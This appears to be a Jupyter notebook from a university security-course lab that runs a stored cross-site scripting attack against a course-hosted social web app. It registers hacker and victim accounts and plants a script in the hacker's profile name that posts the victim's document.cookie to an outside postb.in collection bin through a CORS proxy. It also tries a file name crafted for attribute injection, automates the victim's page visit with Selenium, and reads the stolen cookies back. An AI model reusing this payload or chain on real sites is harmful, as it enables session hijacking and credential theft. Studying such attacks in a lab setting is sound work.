### XSS

In [51]:
import os
import time 
import json
import binascii
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from selenium.common.exceptions import TimeoutException

In [32]:
# Create postb.in bin
r = requests.post('https://postb.in/api/bin')
bin_id = r.json()['binId']
print(f'https://postb.in/b/{bin_id}')

https://postb.in/b/1603659138297-7244588069152


In [69]:
BASE_URL = 'http://1e20646419f415513131d83be200e0326560be38193c43242109fc7f9223.project.ssof.rnl.tecnico.ulisboa.pt'
TARGET_URL = f'https://postb.in/{bin_id}'

In [70]:
# Login victim and hacker
victim = {
    'username': 'victim16',
    'password': 'victim',
}
hacker = {
    'username': 'hacker16',
    'password': 'hacker',
}

vs = requests.Session()
r = vs.post(url=BASE_URL + '/register', data=victim)
r = vs.post(url=BASE_URL + '/login', data=victim)

hs = requests.Session()
r = hs.post(url=BASE_URL + '/register', data=hacker)
r = hs.post(url=BASE_URL + '/login', data=hacker)

In [71]:
# hacker makes a friend request to the victim
r = hs.post(url=BASE_URL + '/request_friend', data={'username': victim['username']})

In [72]:
def start_driver():
    chrome_options = Options()
    chrome_options.add_argument("--headless")
    chrome_options.add_argument("--no-sandbox")
    driver = webdriver.Chrome(options=chrome_options)
    driver.set_page_load_timeout(5)
    driver.set_script_timeout(5)

    return driver

In [73]:
# Hacker uploads a profile picture
steal_cookies = ' onerror="alert(1)"'

with open(steal_cookies, 'w') as f:
    f.write('Evil profile picture')

driver = start_driver()
driver.get(BASE_URL + '/login')
driver.find_element_by_id('username').send_keys(hacker['username'])
driver.find_element_by_id('password').send_keys(hacker['password'])

driver.find_element_by_class_name('btn-success').click()
driver.add_cookie({'name': '_ga', 'value': 'GA1.2.663725531.1598468128'})
driver.add_cookie({'name': 'mySecretCookie', 'value': 'Tasty'})

In [74]:
driver.get(BASE_URL + '/profile')

driver.find_element_by_id('photoInput').send_keys(os.path.abspath(steal_cookies))
driver.find_element_by_id('currentpasswordInput').send_keys(hacker['password'])
driver.find_element_by_class_name('btn-primary').click()


In [64]:
victim

{'username': 'victim15', 'password': 'victim'}

In [26]:
# Hacker creates a post that steals data from the victims

# var xhr = new XMLHttpRequest();
# xhr.open("POST", "https://postb.in/1603555839181-2461015884764", true);
# xhr.setRequestHeader("Content-Type", "application/json");
# xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
# xhr.send(JSON.stringify({
#     "cookie": document.cookie
# }));

steal_cookies = f'''
<script>
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://cors-anywhere.herokuapp.com/{TARGET_URL}", true);
    xhr.setRequestHeader("Content-Type", "application/json");
    xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
    xhr.send(JSON.stringify({{
        "cookie": document.cookie
    }}));
    //alert("You are under attack!");
</script>'''

driver = start_driver()
# Hacker login
driver.get(BASE_URL + '/login')
driver.find_element_by_id('username').send_keys(hacker['username'])
driver.find_element_by_id('password').send_keys(hacker['password'])
driver.find_element_by_class_name('btn-success').click()

# Update hacker profile with malicious content
driver.get(BASE_URL + '/profile')
driver.find_element_by_id('nameInput').send_keys(steal_cookies.replace('\n', '  '))
driver.find_element_by_id('currentpasswordInput').send_keys(hacker['password'])
driver.find_element_by_class_name('btn-primary').click()


In [27]:
driver.close()

In [30]:
# The victim opens the pending requests page and the malicious script gets executed
# Login
driver = start_driver()
driver.get(BASE_URL + '/login')
driver.find_element_by_id('username').send_keys(victim['username'])
driver.find_element_by_id('password').send_keys(victim['password'])

driver.find_element_by_class_name('btn-success').click()
driver.add_cookie({'name': '_ga', 'value': 'GA1.2.663725531.1598468128'})
driver.add_cookie({'name': 'mySecretCookie', 'value': 'Tasty'})

# Open /pending_requests
driver.get(BASE_URL + '/pending_requests')
time.sleep(20)
driver.close()

### Postb.in create bin and track contents

In [29]:
from pprint import pprint

x = requests.get(f'https://postb.in/api/bin/{bin_id}/req/shift')
if x.ok:
    pprint(x.json()['body'])
x = requests.get(f'https://postb.in/api/bin/{bin_id}/req/shift')
if x.ok:
    pprint(x.json()['body'])